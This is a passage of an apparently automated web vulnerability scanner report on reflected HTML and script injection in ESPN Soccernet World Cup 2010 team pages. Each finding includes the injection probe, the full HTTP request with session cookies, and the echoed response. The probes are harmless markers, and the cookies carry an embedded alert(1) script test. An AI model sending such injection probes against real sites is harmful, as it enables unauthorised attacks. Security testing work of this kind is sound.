<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Slovenia Football / ...[SNIP]... <a href="/worldcup2010/team?team=472&64674"><a>258595f7676=1&_slug_=slovenia&64674"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db0a"><a>888baac8773 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland4db0a"><a>888baac8773 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:58 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT Content-Length: 82022 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&_slug_=switzerland4db0a"><a>888baac8773&topId=802287&linktext=Hitzfeld+says+pressure+cost+Swiss"> ...[SNIP]...
5.94. http://soccernet.espn.go.com/worldcup2010/team/_/team/475/switzerland [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/475/switzerland
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82f0d"><a>d5df743ea71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/475/switzerland?82f0d"><a>d5df743ea71=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:17 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:17 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:33:17 GMT Content-Length: 82130 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Switzerland Footbal ...[SNIP]... <a href="/worldcup2010/team?team=475&82f0d"><a>d5df743ea71=1&_slug_=switzerland&82f0d"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa8c8"><a>f460e0de5a0 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/francefa8c8"><a>f460e0de5a0 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:09:31 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:09:31 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN08 Cache-Expires: Sat, 06 Nov 2010 23:14:31 GMT Content-Length: 80435 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&_slug_=francefa8c8"><a>f460e0de5a0&topId=806664&linktext=New+France+coach+admits+concerns"> ...[SNIP]...
5.96. http://soccernet.espn.go.com/worldcup2010/team/_/team/478/france [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/478/france
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 80bf3"><a>247a72dcc41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/478/france?80bf3"><a>247a72dcc41=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN17 Cache-Expires: Sat, 06 Nov 2010 23:13:24 GMT Content-Length: 80543 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>France Football / S ...[SNIP]... <a href="/worldcup2010/team?team=478&80bf3"><a>247a72dcc41=1&_slug_=france&80bf3"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81a1"><a>b81a40a8bd9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coasta81a1"><a>b81a40a8bd9 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:15:13 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:15:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN15 Cache-Expires: Sat, 06 Nov 2010 23:20:08 GMT Content-Length: 81695 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&_slug_=ivory-coasta81a1"><a>b81a40a8bd9&topId=802166&linktext=Eriksson+hails+Ivory+Coast+players"> ...[SNIP]...
5.98. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/4789/ivory-coast
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ff8"><a>ef29493db25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coast?44ff8"><a>ef29493db25=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:11:09 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:11:08 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN18 Cache-Expires: Sat, 06 Nov 2010 23:16:08 GMT Content-Length: 81803 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Ivory Coast Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4789&44ff8"><a>ef29493db25=1&_slug_=ivory-coast&44ff8"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b84"><a>1e9fca54d00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark46b84"><a>1e9fca54d00 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:48 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:48 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:13:48 GMT Content-Length: 82130 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Denmark Football / ...[SNIP]... <a href="/worldcup2010/team?team=479&_slug_=denmark46b84"><a>1e9fca54d00&topId=801786&linktext=Denmark+coach+devastated+by+defeat"> ...[SNIP]...
5.100. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/479/denmark
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92395"><a>78611054bea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark?92395"><a>78611054bea=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
